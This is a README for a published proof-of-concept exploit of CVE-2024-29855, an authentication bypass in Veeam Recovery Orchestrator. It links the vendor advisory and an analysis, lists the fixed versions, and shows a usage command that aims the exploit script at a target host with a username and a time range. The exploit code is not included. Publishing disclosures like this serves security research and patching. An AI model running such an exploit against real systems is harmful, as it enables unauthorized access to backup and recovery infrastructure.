Medium Severity
CVE-2024-29855
Published: Jul 16, 2025
PoC for the Veeam Recovery Orchestrator Authentication CVE-2024-29855
# CVE-2024-29855
Veeam Recovery Orchestrator Authentication Bypass ([CVE-2024-29855](https://www.veeam.com/kb4585)) by [Sina Kheirkhah (@SinSinology)](https://x.com/SinSinology) of [SummoningTeam (@SummoningTeam)](https://x.com/summoningteam)
## Technical Analysis
[A root cause analysis of the vulnerability can be found on my blog
](https://summoning.team/blog/veeam-recovery-Orchestrator-auth-bypass-CVE-2024-29855/
)
## Summary
Veeam published a [CVSS 9](https://www.veeam.com/kb4585) advisory for a [authentication bypass vulnerability CVE-2024-29855](https://www.veeam.com/kb4585) affecting [Veeam Recovery Orchestrator](https://www.veeam.com/disaster-recovery-orchestrator.html), Following is my full analysis and exploit for this issue, although the issue is not as severe as it might sound (DO NOT PANIC AT ALL) but i found the mechanics of this vulnerability a bit interesting and decided to publish my detailed analysis and exploit for it.
<p align="center">
<img src="/poc.jpg" />
</p>
# Vulnerable versions?
According to Veeam [official advisory](https://www.veeam.com/kb4585), The vulnerability discussed was resolved starting in:
Veeam Recovery Orchestrator 7.1.0.230
Veeam Recovery Orchestrator 7.0.0.379
## Usage
```
python CVE-2024-29855.py --start_time 1718264404 --end_time 1718264652 --username [email protected] --target https://192.168.253.180:9898/
_______ _ _ _______ _______ _____ __ _ _____ __ _ ______ _______ _______ _______ _______
|______ | | | | | | | | | | | \ | | | \ | | ____ | |______ |_____| | | |
______| |_____| | | | | | | |_____| | \_| __|__ | \_| |_____| . | |______ | | | | |
(*) Veeam Recovery Orchestrator Authentication Bypass (CVE-2024-29855)
(*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)